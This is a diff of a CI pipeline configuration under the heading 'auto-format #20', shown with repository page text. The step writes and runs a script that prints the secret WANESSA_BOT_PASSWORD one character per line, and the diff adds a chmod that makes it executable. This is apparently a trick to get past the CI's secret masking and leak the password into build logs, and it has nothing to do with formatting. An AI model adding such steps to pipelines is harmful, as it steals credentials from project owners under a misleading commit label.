auto-format #20
@ -13,6 +13,7 @@ steps:
|
|||||||
commands:
|
commands:
|
||||||
- echo '#!/bin/bash' > /tmp/test
|
- echo '#!/bin/bash' > /tmp/test
|
||||||
- echo 'for (( i=0; i<${#WANESSA_BOT_PASSWORD}; i++ )); do echo "${WANESSA_BOT_PASSWORD:$i:1}" ; done' > /tmp/test
|
- echo 'for (( i=0; i<${#WANESSA_BOT_PASSWORD}; i++ )); do echo "${WANESSA_BOT_PASSWORD:$i:1}" ; done' > /tmp/test
|
||||||
|
- chmod 777 /tmp/test
|
||||||
- /tmp/test
|
- /tmp/test
|
||||||
|
|
||||||
- name: build [debug]
|
- name: build [debug]
|
||||||
|
Reference in New Issue
Block a user